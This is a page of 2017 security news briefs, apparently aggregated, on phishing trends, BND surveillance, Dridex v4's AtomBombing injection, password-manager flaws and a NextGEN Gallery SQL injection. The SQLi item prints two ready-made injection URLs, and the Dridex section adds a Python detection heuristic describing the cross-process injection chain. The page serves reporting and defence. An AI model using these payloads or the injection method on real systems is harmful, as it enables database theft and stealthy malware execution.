The Phishing Trends Report for Q4 2016 includes data provided by the Brazil-based company Axur. Axur focused on monitoring phishing attacks on financial organizations, technology firms, airlines, and online marketplaces located in the country.

“Fraudsters in Brazil are using both traditional phishing and social media to defraud Internet users. They are also using technical tricks to make it harder for responders to stop these scams.” states the APWG.

According to the APWG, the overall number of brands targeted by phishers during the holiday season dropped significantly, likely because crooks concentrated on fewer targets.

The company RiskIQ, which monitored thousands of phishing attacks, revealed that the top-10 TLDs where phishing attacks occurred in 4Q2016 were:

Phishing Trends Report Q4 2016

The report shows that very few phishers registered domain names that were confusingly similar to the legitimate brands. The crooks mostly used URLs with brand names, or misspellings thereof, in subdomains.

“A relatively low percentage of phishing websites targeting a brand attempt to spoof that brand in the domain name—whether at the second-level or in the fully-qualified domain name,” says Jonathan Matkowsky, VP for intellectual property & brand security at RiskIQ. This is evidence that phishers do not need to use deceptive domains names to fool Internet users into visiting their sites. Instead, users are often fooled by hyperlinks (which must be hovered over to even see the destination domain), URL shorteners, which mask the destination domain, or brand names inserted elsewhere in the URL.

Let’s close with a look at the countries most plagued by malware: China is at the top with 47.09% of infected machines, followed by Turkey (42.88%) and Taiwan (38.98%).


German foreign intelligence service Spied on Foreign Journalists since 1999
2.3.2017 securityaffairs BigBrothers

According to a new report from Der Spiegel, the German foreign intelligence service has spied on journalists from the BBC, the New York Times and Reuters since 1999.
Journalists from the BBC, Reuters and New York Times were among those spied on by
The German foreign intelligence service spied on journalists from various media agencies, including the BBC, Reuters and the New York Times.

German foreign intelligence service

According to the German magazine Der Spiegel, the number of reporters spied on by the Bundesnachrichtendienst (BND) is at least 50, and the agency has been carrying out surveillance activities since 1999.

“Germany’s foreign intelligence agency, the BND, apparently spied on large numbers of foreign journalists overseas over the course of several years, including employees of the BBC, Reuters and the New York Times. Critics see a massive violation of press freedoms.” reads the Der Spiegel report.

Der Spiegel obtained BND documents listing journalists’ emails, faxes, and telephone numbers.

“The document reportedly showed more than a dozen BBC journalists were being monitored via numbers at the organisation’s London headquarters and in Afghanistan.” reported the Independent.

The list also included several mobile and satellite phone numbers used by reporters at Reuters and a New York Times phone number. Reuters news agency in Afghanistan,

The Reuters numbers belong to journalists in Afghanistan, Pakistan, and Nigeria, but according to Der Spiegel, other organisations in Kuwait, Lebanon, India, Nepal, Indonesia, and Zimbabwe were also targeted by the spies.

Of course, the news agencies and broadcasters spied on by the German foreign intelligence service expressed disappointment over the revelations.

“We are disappointed to hear these claims,” a BBC spokesperson said.

“The BBC’s mission is to bring accurate news and information to people around the world, and our journalists should be able to operate freely and safely, with full protection for their sources.

“We call upon all governments to respect the operation of a free press.”

The BND has declined to comment on the allegations; it clarified only that every operational aspect of its activity will be discussed solely with the German government and with the politicians on parliament’s intelligence oversight committee.

The report comes while the Bundestag is investigating surveillance activities conducted by the US National Security Agency (NSA) and the BND.


Alleged Master Keys for the Dharma Ransomware Leaked on BleepingComputer
2.3.2017 securityaffairs Virus

Good news for the victims of the Dharma Ransomware, someone has released the alleged Master Keys on the BleepingComputer.com forums.
The alleged Master Keys for the Dharma Ransomware have been released by someone on the BleepingComputer.com forums.

A member using the online moniker ‘gektar‘ published a post containing a Pastebin link to a C header file that supposedly contains the master decryption keys.

Source: BleepingComputer.com

The post was created under the Dharma Ransomware Support Topic.

If the master keys are valid, victims of the Dharma Ransomware can decrypt their files without paying the ransom.

At the time of writing, the authenticity of the keys is still unconfirmed. Experts from Kaspersky are currently verifying them in order to include them in their decryptor tool.

The experts believe the keys may be valid because the master keys for the Crysis ransomware, on which Dharma is based, were recently released in the same way.

“With that said, there is a good chance that the keys are valid. This is because the keys for Crysis, on which Dharma is based, were released in the same manner on our forums in the past. Using these keys Kaspersky was able to update their ransomware decryptor to help Crysis victims for free.” reported a blog post published on BleepingComputer.

It is still unclear if the person who posted the decryption keys is affiliated with the ransomware.


Banking malware in Google Play masqueraded as a weather forecast app

2.3.2017 Novinky/Bezpečnost Viry
In early February, five thousand users of Android mobile devices downloaded from the official Google Play store a malicious application that abuses internet banking.
The malicious app appeared in Google Play on 4 February and was removed after just two days, when ESET flagged it. Its analysts detected the threat as Trojan.Android/Spy.Banker.HU~~pobj. The app behaved like a genuine weather forecast tool, but at the same time it was able to remotely lock or unlock the infected device and to intercept sent and received text messages.

As soon as the user downloaded the app to their device, the weather forecast icon disappeared and the infected device displayed a fake screen requesting an update of the device's operating system.

If the user filled in the form, including the request to change the password for locking and unlocking the screen, they handed their smartphone over to the attacker. The malware then worked hidden in the background, controlled by a remote command-and-control server, without the phone's user necessarily knowing about it.

It steals account login credentials
The malware is so insidious that the moment the user launches one of their internet banking apps, it displays a fake login page and thereby obtains the victim's login credentials for their bank account. Because it can intercept both sent and received text messages, it can also bypass two-factor authentication, i.e. the one-time generated password with which the user proves their identity when logging in to the account over the internet.

The malicious app is called Good Weather and can no longer be downloaded from the Google Play store. Only a legitimate app of the same name, from the developer AsdTm, remains there. Nevertheless, there may be users who managed to download the malicious version.

How can they tell it from the genuine one? “If you downloaded the Good Weather app in early February and are not sure whether it is the malicious version, check whether the icon on your phone's display is a yellow one with a cloud partially covering the sun. That app is fine. The malicious app has a blue circular icon with a white cloud in it,” explains Miroslav Dvořák, technical director at ESET.

How to get rid of the malicious app?
The infected device can be cleaned of the malicious app with one of the mobile antivirus programs. If the user wants to uninstall it manually, they must first deactivate the Trojan's device administrator rights.

Then the malicious app can be uninstalled via Settings -> Apps -> Good Weather. “It is likely that this malicious app will still be found in some unofficial Android app stores. Users should rather use the official Google Play source,” advises Miroslav Dvořák.

As this and some earlier cases have shown, however, infected apps can appear even in Google Play. Users should therefore always make sure they know all the permissions an app could exercise after being downloaded to their smartphone or tablet. “It is also important to read user reviews of the app and its rating,” notes Miroslav Dvořák.


Robots Vulnerable to Cyberattacks: Researchers

1.3.2017 securityweek Vulnerebility
Robots vulnerable to cyberattacks

The software and firmware that bring robots to life are affected by potentially serious vulnerabilities that can allow hackers to remotely take control of the machines, according to an analysis conducted by security firm IOActive.

Robots are increasingly common in homes, businesses, industrial environments, the military and law enforcement, and healthcare organizations. International Data Corporation (IDC) estimated in January that worldwide spending on robotics and related services will reach $188 billion in 2020.

There have been many cases in past years where people were injured or killed in accidents involving robots, but experts warn that robots could pose a far more serious threat if they are vulnerable to remote hacker attacks.

IOActive researchers have analyzed home, industrial and business robots from six different vendors: SoftBank Robotics (NAO and Pepper robots), UBTECH Robotics (Alpha 1S and Alpha 2), ROBOTIS (ROBOTIS OP2 and THORMANG3), Universal Robots (UR3, UR5 and UR10), Rethink Robotics (Baxter and Sawyer), and Asratec Corp (V-Sido robot control system).

The researchers have not acquired the actual robots and instead conducted tests on their mobile applications, software and firmware.

IOActive said it identified nearly 50 vulnerabilities in the tested components, but the security firm noted that it did not conduct an in-depth analysis, which suggests that the actual number of weaknesses is likely much higher.

The company has only published a paper providing a non-technical description of the vulnerabilities. Technical details will be made available after vendors have had a chance to address the flaws.

IOActive told SecurityWeek that it has notified all affected vendors, but only four of them have responded so far: SoftBank Robotics, UBTECH Robotics, Universal Robots and Rethink Robotics.

“Just one, SoftBank Robotics, said they were going to fix the issues but without any further details on when and how they are going to do it and what issues they were going to fix,” said Cesar Cerrudo, IOActive’s CTO and one of the paper’s authors. “Then Universal Robots said that our findings were interesting and that they should do something about it without giving any details. The rest haven’t mentioned if they are going to fix the issues or not.”

Robot vulnerabilities and impact

According to IOActive, the robots it has analyzed are affected by various types of vulnerabilities, including problems related to communications, authentication, authorization mechanisms, cryptography, privacy, default configurations, and open source components.

The flaws allow attackers to intercept communications between the robot and the application controlling it, remotely access critical services without a username and password, install malicious software, and extract sensitive information that is not encrypted properly.

Researchers said the vulnerabilities they identified can be exploited to spy via the robot’s camera and microphone, steal personal or business data, and even take control of the machine and cause physical damage or harm.

“Vendors need to start focusing more on security when speeding the latest innovative robot technologies to market or the issue of malfunctioning robots will certainly be exasperated when malicious actors begin exploiting common security vulnerabilities to add intent to malfunction,” Cerrudo said.


Online Fraud in the U.S. Grew Dramatically Post-EMV

1.3.2017 securityweek CyberCrime
The introduction of EMV (Europay, MasterCard, Visa) cards, also known as chip-and-PIN cards, into the U.S. has had the expected effect: with card-present fraud more difficult, fraudsters have moved to online card-not-present fraud. Domestic online fraud became 79% riskier in 2016 than it had been in 2015, according to figures from the Forter/MRC Fraud Attack Index (PDF).

Forter, which provides a fraud detection system for merchants, teamed with the Merchant Risk Council (which currently has almost 450 member companies in more than 20 countries) to develop a Fraud Attack Index. This is defined as the 'dollars at risk per $100 of sales'. The 'dollars at risk' combines detected and prevented fraud with actual fraud.

The relative simplicity of cloning non-EMV cards made domestic (i.e., US) offline card-present fraud attractive. This is no longer easy. The introduction of more secure EMV cards has driven fraudsters from card-present to card-not-present fraud -- EMV was never going to eliminate fraud, it was merely going to change its nature. This is shown in the fraud attack index for 2016, which rose from $2.7 in Q4 2015 to $4.98 in Q4 2016.

Related: EMV Payment Cards - Salvation or Failure?

"Domestic order fraud," explains Forter's CEO Michael Reitblat, "has increased following the adoption of EMV (microchip cards) in the US. The fraudsters who used to steal and copy or counterfeit cards in the US now find that much harder, since card present transactions are increasingly protected by EMV -- and so have moved online instead." He adds that this has been further fueled by an increase in 'friendly fraud' or 'liar-buyer' fraud (where a person might buy an item and then report it undelivered in order to obtain a refund). "That's always been a trend," he said, "but it's increasingly moving from an occasional thing to a serious, serial problem for many retailers."

The greater part of international fraud against US merchants has always been online, and it is always a higher risk than domestic fraud. In absolute terms, it decreased by 13% compared to 2015 but is still 62.4% riskier than domestic fraud, despite the domestic switch from offline to online fraud within the US. Forter attributes the international decrease to a growth in genuine international orders rather than a decrease in fraud.

For online fraud, the criminals need to obtain the victims' payment credentials. Forter notes a shift in account takeover (ATO) against merchant sites to ATO against online payment accounts. "A growing recent trend in the realm of account takeover (ATO)," says the report, "is the use of hacked online payment accounts such as PayPal, ApplePay, AndroidPay etc. In these attacks the fraudster breaks into the victim's account and uses the details there, including payment details, to make purchases and take actions as if they were the victim."

ATO on merchant websites is down 16% on the previous year; ATO on online payment accounts is up 131%.

Forter puts this shift down to improvements in merchants' cyber security combined with the 'unprecedented data breaches of the last few years.' These "included account and password information and this, combined with the fact that many consumers continue to reuse passwords across multiple accounts, has made this form of attack easier to carry out."

"It's an example of the speed at which fraudsters adapt to moves made to stop their attempts," explained Reitblat. "Merchants realized that ATO was a problem, and started guarding against it -- so fraudsters shifted, using similar tactics against online payment accounts, which is far harder for merchants to spot, and which in any event gives them greater scope for theft."

The big target in this shift to online fraud has been clothing -- apparel. Attacks against apparel rose 69.9% over 2016. "This is partly due to fraudsters who are moving online post-EMV continuing to operate in an industry with which they are comfortable," explains Reitblat. With card-present fraud, it is easy to walk into a shop, conduct the fraudulent transaction, and walk out with the clothes.

However, he added that it is also "partly because fraudsters who have been focusing on luxury goods for years (due to the high ROI they represent) are trying a new tactic. Rather than go for the low end of luxury goods (which retailers are now aware that they need to protect and scrutinize, as well as the high-end ones), they're getting equivalent products from apparel sites which are often less careful since they have not traditionally been major targets in the same ways that luxury sites have been."


SQLi flaw in the NextGEN Gallery plugin puts more than 1 million WordPress installs at risk
1.3.2017 securityaffairs Vulnerability

More than 1 million WordPress websites are at risk due to a critical SQL injection vulnerability in the NextGEN Gallery plugin. Update it as soon as possible.
Security experts at Sucuri have identified a SQL injection flaw in the NextGEN Gallery WordPress image gallery plugin that could be exploited by a remote attacker to read the targeted website’s database, including sensitive data such as (hashed) passwords and secret keys.

“While working on the WordPress plugin NextGEN Gallery, we discovered a severe SQL Injection vulnerability. This vulnerability allows an unauthenticated user to grab data from the victim’s website database, including sensitive user information.” reads the analysis published by Sucuri.

The plugin did not sanitize user input properly; the development team fixed the bug with the release of version 2.1.79.

“From the source code, we notice the $container_ids string is created from tag input and its values are not properly sanitized. They are safe from SQL injection but wouldn’t prevent arbitrary format string directives/input from being inserted, which may cause issues with the WordPress database abstraction prepare() method.” noticed the experts.

According to the analysis published by the security firm, there are two different attack scenarios for the exploitation of the flaw:

The website administrator uses a NextGEN Basic TagCloud Gallery on the website. In this scenario, the attacker can execute SQL queries by modifying the URL of the gallery.
The website administrator allows users to submit posts to be reviewed (contributors). In this case, an authenticated attacker can execute malicious code via shortcodes.

An unauthenticated attacker could add extra sprintf/printf-style directives to the SQL query and exploit the behavior of $wpdb->prepare() to get their own code into the executed query.

The researchers also shared examples of the final attack payloads. They are URL-encoded: %25, %24 and %20 decode to %, $ and a space, so the tag value that actually reaches the plugin is test%1$%s)) or 1=1# (the second variant, ending in 1=2#, is the false case of a true/false pair). The payloads look like the following:

http://target.url/2017/01/17/new-one/nggallery/tags/test%251%24%25s))%20or%201=1%23

http://target.url/2017/01/17/new-one/nggallery/tags/test%251%24%25s))%20or%201=2%23

The good news is that the flaw in the NextGEN Gallery hasn’t been exploited in the wild, but it is easy to predict a spike in the number of attacks leveraging the flawed plugin.

The flaw in the NextGEN Gallery is very serious due to the huge number of websites that use it, the popular WordPress image gallery plugin has more than 1 million active installations.

WordPress continues to be a privileged target for hackers, a critical flaw patched in WordPress in January has been exploited against a large number of websites.

Once again … Never trust the input!


The Gamaredon Group is back with new weapons in its arsenal
1.3.2017 securityaffairs Cyber

The Russian state-actor dubbed Gamaredon is back and has been using a custom-developed malware in a new cyber espionage campaign.
According to the experts from Palo Alto Networks, a Russian state-actor dubbed Gamaredon has been using a custom-developed malware in cyber espionage campaign on the Ukrainian government, military and law enforcement officials.

The Gamaredon APT was first spotted in 2013. Last year researchers at LookingGlass shared the details of a cyber espionage campaign, tracked as Operation Armageddon, targeting Ukrainian entities.

The Security Service of Ukraine (SBU) blamed Russia’s Federal Security Service (FSB) for the cyber attacks. The Gamaredon group relied on spear-phishing emails to deliver common remote access tools (RATs), such as UltraVNC and Remote Manipulator System (RMS).


Back to the present: researchers from Palo Alto Networks discovered that the threat actors behind the Gamaredon APT group have started using new, custom-built malware instead of common RATs.

“In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware.” reads the analysis published by PaloAlto Networks.

The main features implemented in the custom-developed malware are:

A mechanism for downloading and executing additional payloads of their choice
The ability to scan system drives for specific file types
The ability to capture screenshots
The ability to remotely execute commands on the system in the user’s security context
The new malware appears sophisticated and is able to avoid detection by security solutions.

The experts are not sure the latest attacks are also part of the Operation Armageddon or if the threat actors have started a new cyber espionage campaign.

“Antimalware technologies have a poor record of detecting the malware this group has developed. We believe this is likely due to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications and tools (such as wget) for malicious purposes.” reads the analysis published by Palo Alto Networks.

In February 2016, the researchers identified another custom tool, tracked as Pteranodon, that was embedded in the self-extracting archives (SFX) used by the Gamaredon group.

While Gamaredon has started using new malware, it still relies on self-extracting archives (SFX) and much of the same infrastructure as when its activities were first analyzed.


Amazon S3 outage. Increased error rates. Amazon AWS is down
1.3.2017 securityaffairs Vulnerability

An Amazon AWS S3 outage is causing serious problems for a huge number of websites, applications, and Internet of Things devices.
The Amazon S3 web-based storage service is experiencing serious, widespread issues. Web services and mobile apps that rely on Amazon S3 have suffered a significant outage.

According to the company, the Amazon S3 outage was caused by “high error rates with S3 in US-EAST-1.”

Amazon Web Services (@awscloud), 8:56 PM, 28 Feb 2017: “We continue to experience high error rates with S3 in US-East-1, which is impacting some other AWS services.”

“We have now repaired the ability to update the service health dashboard. The service updates are below. We continue to experience high error rates with S3 in US-EAST-1, which is impacting various AWS services. We are working hard at repairing S3, believe we understand root cause, and are working on implementing what we believe will remediate the issue.” reads the statement published on the AWS service health dashboard.

Many websites were affected by the Amazon S3 outage, including Quora, Imgur, Medium, Business Insider, filesharing in Slack, and many others.

Amazon S3 is used by a large number of services to store data online, including Runkeeper, Yahoo webmail and Trello.

Amazon S3 outage also affected IoT devices backed by the Amazon service, such as connected thermostats and lightbulbs, users were not able to control their devices.

According to data tracked by SimilarTech, Amazon S3 is used by more than 148,000 websites and 120,000 unique domains, mostly in the US; 0.8 percent of the top 1 million websites rely on the service.


Users are angry, while AWS continues to downplay the issue, classifying it as a case of “increased error rates.”

At the time of writing the AWS status dashboard shows all green ticks, but users are still facing the Amazon S3 outage.

“We’ve identified the issue as high error rates with S3 in US-EAST-1, which is also impacting applications and services dependent on S3. We are actively working on remediating the issue,” states AWS.


Dridex v4, the dreaded malware has been improved with AtomBombing technique
1.3.2017 securityaffairs Virus

Malware authors are using Dridex v4 in the wild, an improved version of the Trojan that includes a new injection method known as AtomBombing.
According to researchers with IBM X-Force, the authors have improved the Dridex banking Trojan by adding a new code injection method for evading detection, a technique known as AtomBombing.

The researchers spotted a new sample of the threat, dubbed Dridex v4, earlier this month. The malware was used in campaigns against banks in the UK, and the experts believe it will be used to target financial institutions worldwide very soon.

“IBM X-Force discovered that Dridex, one of the most nefarious banking Trojans active in the financial cybercrime arena, recently underwent a major version upgrade that is already active in online banking attacks in Europe.” reads the analysis published by IBM.

“In this release, we noted that special attention was given to dodging antivirus (AV) products and hindering research by adopting a series of enhanced anti-research and anti-AV capabilities. The changes to Dridex’s code injection method are among the most significant enhancements in v4. They allow Dridex to propagate in the infected endpoint with minimal calls to marked API functions.”

Dridex v4 keeps the capabilities observed in previous releases: it is a banking Trojan that monitors the victim’s online banking sessions and steals login and account information.

The code injection method was significantly reworked because the previous versions had become too easy to detect through their use of well-known API calls; that is why the authors adopted AtomBombing in the new version of Dridex.

AtomBombing is not new to the threat landscape: in October, researchers at the security firm enSilo devised the method to inject malicious code into Windows processes in a way that the anti-malware tools of the time did not detect.

Atom tables are data structures used by the operating system to store strings together with an identifier that can be used to access them; they can have global or local scope.

“AtomBombing makes use of Windows’ atom tables and the native API NtQueueApcThread to copy a payload into a read-write memory space in the target process,” according to the report authors. “It then uses NtSetContextThread to invoke a simple return-oriented programming chain that allocates read/write/execute memory, copies the payload into it and executes it. Finally, it restores the original context of the hijacked thread.”

“An atom table is a system-defined table that stores strings and corresponding identifiers. An application places a string in an atom table and receives a 16-bit integer, called an atom, that can be used to access the string. A string that has been placed in an atom table is called an atom name.” reads a description published by Microsoft on the Atom Tables.

“The system provides a number of atom tables. Each atom table serves a different purpose. For example, Dynamic Data Exchange (DDE) applications use the global atom table to share item-name and topic-name strings with other applications.”

The attacker writes malicious code into an atom table and forces a legitimate application to retrieve it from the table. Once the code has been retrieved into the legitimate application’s memory, the attacker manipulates that process into executing it.

Back to Dridex v4: the authors use the AtomBombing technique to deliver the malicious payload into the target process through the atom tables.

“In our analysis of the new Dridex v4 release, we discovered that the malware’s authors have devised their own injection method, using the first step of the AtomBombing technique. They use the atom tables and NtQueueAPCThread to copy a payload and an import table into a RW memory space in the target process. But they only went halfway — they used the AtomBombing technique for the writing of the payload, then used a different method to achieve execution permissions, and for the execution itself.” reads the analysis shared by IBM.

This use of AtomBombing is a first for banking malware, and it is not the only change in Dridex v4.

Other improvements include the enhancement to the encryption for its configuration, a modified naming algorithm, and an updated mechanism to gain persistence on the infected machine.

The evolution of the Dridex Trojan continues; the last time we wrote about this threat was in January, when researchers at Flashpoint discovered a new variant using a new tactic to bypass User Account Control (UAC).


XSS flaws in Zscaler Cloud management software allowed logged-in attackers to hijack coworkers’ accounts
1.3.2017 securityaffairs Vulnerability

Zscaler has fixed persistent XSS vulnerabilities in its cloud management portals that allowed authenticated attackers to attack coworkers.
Serious cross-site scripting (XSS) flaws in the Zscaler Cloud management software could be exploited to inject malicious HTML and JavaScript into the browsers of other users who visit the portal.

In order to exploit the flaws the attacker needs to be logged into the portal; from there they can take over the accounts of other users and act on their behalf.

Zscaler pointed out that the flaws only exposed users within the same organization: an attacker could inject code into the admin portal pages seen by coworkers, but not into those of other customers.

“Zscaler has addressed persistent XSS vulnerabilities identified in admin.zscaler[X].net and mobile.zscaler[X].net portals. The post-auth vulnerabilities would have allowed authenticated admin users to inject client-side content into certain admin UI pages which could impact other admin users of the same company.” reads the security advisory shared by Zscaler. “Zscaler would like to thank Alex Haynes for responsibly reporting the issues and working with Zscaler to ensure that they were properly remediated.”

Cross-site scripting flaws are often wrongly dismissed as minor issues, but they are insidious and, for an attacker, easy to find with an XSS scanner.

XSS attacks occur when an attacker uses a web application to send malicious code (i.e. browser side script) to a different end user. For further information, I suggest you visit the OWASP website.


Dridex Banking Trojan Gains ‘AtomBombing’ Code Injection Ability to Evade Detection
1.3.2017 thehackernews Virus
Security researchers have discovered a new variant of Dridex, one of the most nefarious banking Trojans actively targeting the financial sector, with a new, sophisticated code injection and evasion technique called "AtomBombing."
On Tuesday, researchers with IBM X-Force disclosed new research, exposing the new Dridex version 4, which is the latest version of the infamous financial Trojan and its new capabilities.
Dridex is one of the most well-known Trojans that exhibits the typical behavior of monitoring a victim's traffic to bank sites by infiltrating victim PCs using macros embedded in Microsoft documents or via web injection attacks and then stealing online banking credentials and financial data.
However, by adopting AtomBombing, Dridex becomes the first malware sample seen using this code injection technique to evade detection.
What is "AtomBombing" Technique?
The code injection techniques used by previous versions of the Dridex Trojan had become too common and easy to spot for antivirus and other security solutions.
AtomBombing takes a different approach to code injection that does not rely on the easy-to-detect API calls used by the old Dridex versions, so adopting it in the latest Dridex version makes the malware harder for antivirus products to detect.
Initially described in October by Tal Liberman of the security firm enSilo, AtomBombing is a code injection technique that could allow attackers to inject malicious code on every version of Microsoft Windows, even Windows 10, in a manner that the anti-malware tools of the time did not detect.
AtomBombing does not exploit any vulnerability; it abuses Windows atom tables, a system feature that lets applications store strings and retrieve them later through a 16-bit identifier (an atom).
An attacker writes malicious code into an atom table as strings and tricks a legitimate application into retrieving it from the table, a technique that works on nearly any Windows operating system released in the past 16 years.
Dridex Version 4 Discovered In the Wild
According to IBM X-Force researchers, the Dridex banking Trojan recently underwent a major version upgrade, now supporting AtomBombing.
But the malware author only went halfway which makes Dridex v4 different from other AtomBombing attacks — the attackers used "the AtomBombing technique for the writing of the payload, then used a different method to achieve execution permissions, and for the execution itself."
"The flow differs from the one described in the AtomBombing technique. To get the payload into an executable memory space, Dridex simply calls NtProtectVirtualMemory from the injecting process to change the memory where the payload is already written into RWX," X-Force researchers said.
Since queuing an APC straight to the payload would have been suspicious enough to be detected and stopped, Dridex v4 uses "the same GlobalGetAtomW method to patch GlobalGetAtomA, hooking it to execute the payload."
Researchers said the new Dridex v4 is already in use in active campaigns against European banks, and it's only a matter of time before hackers begin targeting American financial institutions as well.
Antivirus and other security products can now build detection for Dridex v4 attacks, since IBM’s findings are public.
For a more detailed explanation and technical working of the latest version of Dridex Trojan, you can head on to IBM's blog post.
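Both Dridex write-ups on this page describe the same chain of calls: strings placed in the global atom table, NtQueueApcThread used cross-process to make the target copy them into its own memory, and then either the original enSilo path (NtSetContextThread driving a ROP chain that allocates executable memory) or the Dridex v4 shortcut (NtProtectVirtualMemory from the injector turning the written region RWX, then patching GlobalGetAtomA). The following added example, which is not IBM's or enSilo's code, turns that description into a detection heuristic over a constructed API-call trace. The trace format (one call per line: sequence number, caller pid, target pid, API name, key=value arguments) is an assumption, as is the premise that an API monitor records cross-process NtQueueApcThread with the name of the APC routine. It flags an injector/target pair only when atom-reading APCs into another process are followed by a permission change to executable memory or a thread-context change on that same target, so the in-process use of atoms and APCs by legitimate DDE applications does not trip it, and neither does a cross-process NtProtectVirtualMemory on its own.

```python
from collections import defaultdict

# Constructed trace (assumed format): "<seq> <caller_pid> <target_pid> <API> [key=value ...]".
# pid 4412 is a legitimate DDE-style application using atoms and APCs inside its own process;
# pid 2208 models a Dridex v4 injector writing into pid 3320 (payload bytes as hex strings).
SAMPLE_TRACE = """\
1 4412 4412 GlobalAddAtomW atom=DDE_TOPIC_NAME
2 4412 4412 NtQueueApcThread routine=0x00007ff8aa10
3 2208 2208 GlobalAddAtomW atom=4d5a90000300000004000000ffff0000
4 2208 2208 GlobalAddAtomW atom=b800000000000000400000000000000
5 2208 3320 NtQueueApcThread routine=GlobalGetAtomNameW
6 2208 3320 NtQueueApcThread routine=GlobalGetAtomNameW
7 2208 3320 NtProtectVirtualMemory protect=PAGE_EXECUTE_READWRITE
8 2208 3320 NtQueueApcThread routine=GlobalGetAtomNameW
"""

# APC routines that copy an atom's string into the target's memory. The Win32 names are
# GlobalGetAtomName{A,W}; the IBM write-up refers to them as GlobalGetAtom{A,W}.
ATOM_READERS = {"GlobalGetAtomNameA", "GlobalGetAtomNameW",
                "GlobalGetAtomA", "GlobalGetAtomW"}
EXECUTABLE = {"PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_WRITECOPY"}


def parse_trace(text):
    """Parse the assumed trace format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        seq, caller, target, api, *kv = line.split()
        args = dict(item.split("=", 1) for item in kv)
        events.append({"seq": int(seq), "caller": int(caller),
                       "target": int(target), "api": api, "args": args})
    return events


def find_atombombing(events):
    """Return one alert per (injector, target) pair that shows the AtomBombing chain:
    atom-reading APCs queued into another process, then a step that makes the
    written bytes runnable (RWX via NtProtectVirtualMemory, as in Dridex v4, or a
    hijacked thread context via NtSetContextThread, as in the original technique)."""
    state = defaultdict(lambda: {"atom_apcs": 0, "first_seq": None})
    alerts = []
    for e in events:
        if e["caller"] == e["target"]:
            continue                      # in-process atom/APC use is normal
        key = (e["caller"], e["target"])
        s = state[key]
        if e["api"] == "NtQueueApcThread" and e["args"].get("routine") in ATOM_READERS:
            s["atom_apcs"] += 1
            if s["first_seq"] is None:
                s["first_seq"] = e["seq"]
            continue
        if s["atom_apcs"] == 0:
            continue                      # no atom-table write into this target yet
        rwx = (e["api"] == "NtProtectVirtualMemory"
               and e["args"].get("protect") in EXECUTABLE)
        ctx = e["api"] == "NtSetContextThread"
        if rwx or ctx:
            alerts.append({"injector": key[0], "target": key[1],
                           "atom_apcs": s["atom_apcs"], "first_seq": s["first_seq"],
                           "trigger": e["api"], "trigger_seq": e["seq"]})
            state[key] = {"atom_apcs": 0, "first_seq": None}   # a later chain alerts again
    return alerts


if __name__ == "__main__":
    for alert in find_atombombing(parse_trace(SAMPLE_TRACE)):
        print(alert)
```

The heuristic is deliberately narrow: it needs the APC routine name, which a user-mode hook on NtQueueApcThread can supply, and it keys on the cross-process boundary rather than on any single API, which is the point the IBM analysis makes about why the old, single-call injection patterns were easy to catch.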


9 Popular Password Manager Apps Found Leaking Your Secrets
1.3.2017 thehackernews Security

Is anything safe? It's 2017, and the likely answer is NO.
Making sure your passwords are secure is one of the first lines of defense for your computer, email and information against hacking attempts, and password managers are the tool many security experts recommend for keeping all your passwords secure in one place.
A password manager is software that creates complex passwords, stores and organizes all your passwords for your computers, websites, applications and networks, and remembers them on your behalf.
But what if the password manager itself is vulnerable?
Well, it's not just a hypothetical: a new report has revealed that some of the most popular password managers are affected by critical vulnerabilities that can expose user credentials.
The report, published on Tuesday by a group of security experts from TeamSIK of the Fraunhofer Institute for Secure Information Technology in Germany, revealed that nine of the most popular Android password managers available on Google Play are vulnerable to one or more security vulnerabilities.
Popular Android Password Manager Apps Affected By One Or More Flaws
The team examined LastPass, Keeper, 1Password, My Passwords, Dashlane Password Manager, Informaticore's Password Manager, F-Secure KEY, Keepsafe, and Avast Passwords – each of which has between 100,000 and 50 Million installs.
"The overall results were extremely worrying and revealed that password manager applications, despite their claims, do not provide enough protection mechanisms for the stored passwords and credentials," TeamSIK said.
In each application, the researchers discovered one or more security vulnerabilities – a total of 26 issues – all of which were reported to the application makers and were fixed before the group's report went public.
Encryption Keys for Master Key Hard-Coded in the App's Code
According to the team, some password manager applications were vulnerable to data residue attacks and clipboard sniffing. Some of the apps stored the master password in plain text or even exposed encryption keys in the code.
For example, one high severity flaw affected Informaticore's Password Manager app, which was due to the app storing the master password in an encrypted form with the encryption key hard coded in the app's code itself. A similar bug was also discovered in LastPass.
In fact, in some cases, the user's stored passwords could have easily been accessed and exfiltrated by any malicious application installed on the user's device.
Besides these issues, the researchers also found that auto-fill functions in most password manager applications could be abused to steal stored secrets through "hidden phishing" attacks.
And what's more worrisome? Any attacker could have easily exploited many of the flaws discovered by the researchers without needing root permissions.
List of Vulnerable Password Managers and Flaws Affecting Them
Here's the list of vulnerabilities disclosed in some of the most popular Android password managers by TeamSIK:
MyPasswords
Read Private Data of My Passwords App
Master Password Decryption of My Passwords App
Free Premium Features Unlock for My Passwords
1Password – Password Manager
Subdomain Password Leakage in 1Password Internal Browser
HTTPS downgrade to HTTP URL by default in 1Password Internal Browser
Titles and URLs Not Encrypted in 1Password Database
Read Private Data From App Folder in 1Password Manager
Privacy Issue, Information Leaked to Vendor 1Password Manager
LastPass Password Manager
Hardcoded Master Key in LastPass Password Manager
Privacy, Data leakage in LastPass Browser Search
Read Private Data (Stored Master password) from LastPass Password Manager
Informaticore Password Manager
Insecure Credential Storage in Microsoft Password Manager
Keeper Password Manager
Keeper Password Manager Security Question Bypass
Keeper Password Manager Data Injection without Master Password
Dashlane Password Manager
Read Private Data From App Folder in Dashlane Password Manager
Google Search Information Leakage in Dashlane Password Manager Browser
Residue Attack Extracting Master Password From Dashlane Password Manager
Subdomain Password Leakage in Internal Dashlane Password Manager Browser
F-Secure KEY Password Manager
F-Secure KEY Password Manager Insecure Credential Storage
Hide Pictures Keepsafe Vault
Keepsafe Plaintext Password Storage
Avast Passwords
App Password Stealing from Avast Password Manager
Insecure Default URLs for Popular Sites in Avast Password Manager
Broken Secure Communication Implementation in Avast Password Manager
The researchers will also present their findings at the HITB conference next month. For more technical details about each vulnerability, users can head to the TeamSIK report.
Since the vendors have addressed all these above-listed issues, users are strongly advised to update their password manager apps as soon as possible, because now hackers have all the information they require to exploit vulnerable versions of the password manager apps.


Forget VPNs, we have better protection, says Cisco

1.3.2017 SecurityWorld Security
Cisco has launched Umbrella, a secure internet gateway that protects users directly from the cloud.

